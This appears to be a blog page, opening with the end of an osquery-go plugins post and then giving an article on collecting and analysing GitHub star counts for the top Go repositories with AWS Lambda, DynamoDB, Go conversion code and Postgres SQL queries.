I’ve described three plugin types (logger, table and config), but there’s a fourth plugin type the osquery-go SDK allows you to write: a distributed plugin. What makes the distributed plugin interesting is that you can schedule queries and get query results from your whole fleet of endpoints in real time. While writing this blog post, I got the idea of implementing the distributed plugin as a Twitter bot: if you tweet a valid query with the #osqueryquery hashtag, you’ll get back a response with the results. Although I’ve left the implementation of this final plugin out of the article, it has a very similar API to the plugins I’ve described above.

You can check out the source of all the plugins above, and a few more examples, in the GitHub repo that I’ve created for this post.

2017-12-20

In April 2017, I thought it would be fun to try setting up a system to track the star counts of the top 1000 Go repositories on GitHub. This article describes how I collected this data and some simple analysis of the dataset.

I want to be clear that this was for fun only and I’m not advocating that the number of stars a repository has is the be-all-end-all of its success. There are many, many repositories I am not mentioning here that are high quality, useful code. There’s also tons of code that lives in private repositories, or outside GitHub on Bitbucket and GitLab. In the context of this article, the stars on GitHub are a set of data used to explore the patterns people have when starring repositories.

Collecting the data

The collection of the stars could be an article all its own (and may become one elsewhere), so I will be brief.

The collection is done by a Lambda function on Amazon Web Services using a timer that triggers an execution every 15 minutes. The lambda function collects the star count of the top 1000 Go repositories, which is the maximum the GitHub search API will return. This is a post about Go, so the lambda function is written in… Python, of course! The total resource usage is well below the free tier limits, so running this function is free indefinitely.
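
The collector itself is a Python Lambda, but since this is a Go post, here is a rough sketch of the same GitHub search API calls in Go, purely for illustration (authentication, error handling and rate-limit handling are left out):

package main

import (
	"encoding/json"
	"fmt"
	"net/http"
)

type searchResult struct {
	Items []struct {
		FullName        string `json:"full_name"`
		StargazersCount int    `json:"stargazers_count"`
	} `json:"items"`
}

// topGoRepos pages through the search API; 10 pages of 100 results is the
// 1000-result cap mentioned above.
func topGoRepos() (map[string]int, error) {
	stars := make(map[string]int)
	for page := 1; page <= 10; page++ {
		url := fmt.Sprintf("https://api.github.com/search/repositories?q=language:go&sort=stars&order=desc&per_page=100&page=%d", page)
		resp, err := http.Get(url)
		if err != nil {
			return nil, err
		}
		var result searchResult
		err = json.NewDecoder(resp.Body).Decode(&result)
		resp.Body.Close()
		if err != nil {
			return nil, err
		}
		for _, item := range result.Items {
			stars[item.FullName] = item.StargazersCount
		}
	}
	return stars, nil
}

func main() {
	stars, err := topGoRepos()
	if err != nil {
		panic(err)
	}
	fmt.Println("repositories tracked:", len(stars))
}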

The data that the lambda function collects is stored in a DynamoDB table that just holds the repo name, an integer timestamp (epoch time in seconds), and the number of stars at that time. By the time this article was started, I had several hundred megabytes of data in DynamoDB. As with the Lambda function, the usage here is below the free tier limit, so the storage is free as well. For reference, the allocated read and write capacity is 20 units each.
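
Again, the real writer is Python, but storing one measurement with the AWS SDK for Go would look roughly like this (a sketch; the table name "github-stars" is an assumption):

package main

import (
	"log"
	"strconv"
	"time"

	"github.com/aws/aws-sdk-go/aws"
	"github.com/aws/aws-sdk-go/aws/session"
	"github.com/aws/aws-sdk-go/service/dynamodb"
)

func main() {
	svc := dynamodb.New(session.Must(session.NewSession()))

	// One measurement: repo name, epoch timestamp in seconds, star count.
	_, err := svc.PutItem(&dynamodb.PutItemInput{
		TableName: aws.String("github-stars"), // assumed table name
		Item: map[string]*dynamodb.AttributeValue{
			"repo":  {S: aws.String("golang/go")},
			"ts":    {N: aws.String(strconv.FormatInt(time.Now().Unix(), 10))},
			"stars": {N: aws.String("12345")},
		},
	})
	if err != nil {
		log.Fatal(err)
	}
}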

To get the data out of DynamoDB, I used the standard AWS Data Pipeline template. The AWS Documentation covers the process well. From there, I had to download it all locally using the AWS CLI and then write a program (this time in Go) to convert the many separate chunk files into one CSV file. This left me with a 726 MB CSV file.

The Go program that does the CSV conversion is incredibly over-engineered, but it was fun to optimize while the next step completed.
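
A very condensed sketch of that conversion step is below. For the sake of the example it assumes each chunk line can be decoded into a record with repo, ts and stars fields; the real Data Pipeline export format needs its own decoding, and the actual program does much more.

package main

import (
	"bufio"
	"encoding/csv"
	"encoding/json"
	"log"
	"os"
	"path/filepath"
	"strconv"
)

// record is a simplified view of one exported DynamoDB item.
type record struct {
	Repo  string `json:"repo"`
	Ts    int64  `json:"ts"`
	Stars int64  `json:"stars"`
}

func main() {
	out := csv.NewWriter(os.Stdout)
	defer out.Flush()

	chunks, err := filepath.Glob("export/*")
	if err != nil {
		log.Fatal(err)
	}
	for _, path := range chunks {
		f, err := os.Open(path)
		if err != nil {
			log.Fatal(err)
		}
		scanner := bufio.NewScanner(f)
		for scanner.Scan() {
			var r record
			if err := json.Unmarshal(scanner.Bytes(), &r); err != nil {
				continue // skip lines we can't decode
			}
			out.Write([]string{r.Repo, strconv.FormatInt(r.Ts, 10), strconv.FormatInt(r.Stars, 10)})
		}
		f.Close()
	}
}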

I decided that a real database was going to be helpful in doing the analysis, so I set up Postgres locally and imported the giant CSV file into a table. The following is the schema and command to copy the CSV data into Postgres. This would be run at the psql command line.

drop table if exists github_stars;

create unlogged table github_stars (
    repo  varchar(255) not null,
    ts    integer      not null,
    stars integer      not null,
    constraint repo_ts primary key(repo,ts)
);

create index repo_idx  on github_stars(repo);
create index ts_idx    on github_stars(ts);
create index stars_idx on github_stars(stars);

\copy github_stars from 'github-stars.csv' csv

Let’s dig in

At the end of this (lengthy) import I was left with a relatively simple table that has 23,279,479 rows of data about 1412 separate repositories. Note that these numbers don’t divide evenly by 1000; that’s because the error handling in the lambda was not extremely robust. It’s designed for long-term trends, not second-by-second updates. The number of tracked repositories is higher than 1000 because some repositories stayed at the same star count and slipped out of view as others increased, while yet others grew rapidly from 0 to reach a relatively high position in the middle of the tracking period.

Total stars per repo

I started by looking at the distribution of total stars per repository. Getting the number of stars for each repository at the end of its sample period was fairly straightforward (but also fairly slow). The graph is the ordered list from rank 1 on down.

select gs.repo, gs.stars
from github_stars as gs
inner join (
    select repo, max(ts) as ts
    from github_stars
    group by repo
) as maxts
on gs.repo = maxts.repo and gs.ts = maxts.ts
order by gs.stars desc;

total_stars

Total star gain

All of the repositories in the tracked set gained a total of 533,614 stars over the tracking period. This was done by finding the min and max timestamp for each repository, getting the star counts at those times, finding the difference, and then summing all those differences.

select sum(maxs.stars-mins.stars) as total_increase
from (
    select gs.repo, gs.stars
    from github_stars as gs
    inner join (
        select repo, max(ts) as ts
        from github_stars
        group by repo
    ) as maxts
    on gs.repo = maxts.repo and gs.ts = maxts.ts
) as maxs
inner join (
    select gs.repo, gs.stars
    from github_stars as gs
    inner join (
        select repo, min(ts) as ts
        from github_stars
        group by repo
    ) as mints
    on gs.repo = mints.repo and gs.ts = mints.ts
) as mins
on maxs.repo = mins.repo;

Rate of star count increase

Through some SQL-fu I produced the sorted list of repositories by the number of stars they collected per day during the time they were tracked. Hold on to your hat for this SQL statement:

select rises.repo, cast(rise as float)/cast(run as float)*(24*60*60) as stars_per_day
from (
    select maxs.repo, maxs.stars-mins.stars as rise
    from (
        select gs.repo, gs.stars
        from github_stars as gs
        inner join (
            select repo, max(ts) as ts
            from github_stars
            group by repo
        ) as maxts
        on gs.repo = maxts.repo and gs.ts = maxts.ts
    ) as maxs
    inner join (
        select gs.repo, gs.stars
        from github_stars as gs
        inner join (
            select repo, min(ts) as ts
            from github_stars
            group by repo
        ) as mints
        on gs.repo = mints.repo and gs.ts = mints.ts
    ) as mins
    on maxs.repo = mins.repo
) as rises
inner join
(
    select repo, max(ts)-min(ts) as run
    from github_stars
    group by repo
) as runs
on rises.repo = runs.repo
where runs.run > 0
order by stars_per_day desc;

This produced a distribution much like others you see with this kind of data: a few repositories in the fat section of the graph account for the majority of the rate increase, with a long tail of repos that are slowly increasing. There is one unfortunate repository sitting at -24 out at the end.

star_gain_per_day

Do bigger repositories grow faster?

I wanted to figure out whether the larger repositories grow faster than smaller ones, so I grabbed the number of stars at the end of the tracking period for each repository and charted that against the number of stars gained per day. The SQL this time is a small tweak to the last one:

select rises.repo, rises.stars as stars,
cast(rise as float)/cast(run as float)*(24*60*60) as stars_per_day
from (
    select maxs.repo, maxs.stars, maxs.stars-mins.stars as rise
    from (
        select gs.repo, gs.stars
        from github_stars as gs
        inner join (
            select repo, max(ts) as ts
            from github_stars
            group by repo
        ) as maxts
        on gs.repo = maxts.repo and gs.ts = maxts.ts
    ) as maxs
    inner join (
        select gs.repo, gs.stars
        from github_stars as gs
        inner join (
            select repo, min(ts) as ts
            from github_stars
            group by repo
        ) as mints
        on gs.repo = mints.repo and gs.ts = mints.ts
    ) as mins
    on maxs.repo = mins.repo
) as rises
inner join
(
    select repo, max(ts)-min(ts) as run
    from github_stars
    group by repo
) as runs
on rises.repo = runs.repo
where runs.run > 0
order by stars desc;

spd_vs_total

Yes! They do, generally. Some smaller repositories have a higher rate, but the larger ones (for which there’s less data) definitely trend higher. To make the data a little easier to see, a log scale can be used on both axes. There’s a definite split between the top repositories and the bottom ones.

spd_vs_total_log

Single Repository Graphs

One of the first things I did early on was to create a Python script that pulls the data for any number of repositories and graphs it using matplotlib. The details can be found in the Python code, but the graphs are fun to look at:

docker and moby graph; dominikh/go-tools graph; Netflix/rend graph

External Effects

One of the more interesting things is seeing how external events can greatly affect individual repositories in the short term. Most projects have short-term jumps in star counts based on blog posts or other external events, like a talk at GopherCon or inclusion in one of the newsletters. That’s mostly speculation; I didn’t spend the time to do the correlation.

Case in point: The first graph clearly shows a sharp rise in star count for moby/moby just after the name change from docker/docker and then a pretty linear rise after that.

Conclusions

  1. Bigger repositories do grow faster. There seems to be an inflection point around 5000 stars.
  2. Smaller repositories can also grow fast. The fastest were in the middle of the pack below the inflection point.
  3. Every project is different. Some will be stable and get less press and therefore grow less. Others are constantly being talked about.

Data

The final collected data (as of this writing) is 23,279,479 rows, over 750 MB raw and about 100 MB gzipped. Unfortunately, the data is too big to just toss up on a website for download. I have provided all of my source code in links above, though, so anyone could easily set this up.

What next?

I haven’t turned it off, so in the time it took to read this article it has likely collected another measurement. I plan on leaving it on for as long as I can. I will also likely adjust the lambda function to collect more kinds of data about the people starring repositories. I think looking at the groupings of repositories by the people who starred them could uncover similarities between them, or at least show what kinds of things a given user is interested in.

If you’re interested in doing this kind of tracking (or just like playing with data), grab all the code linked above and start it running in your own AWS account. It’s (almost) free and you can have fun playing with the output. If anyone wants the source data or has any other questions, you can contact me on Twitter or by email. Let me know what you thought, and if you have ideas on what to do with all this data, I’d love to hear them.

Twitter: @sgmansfield

GitHub: ScottMansfield

Email: sgmansf@gmail.com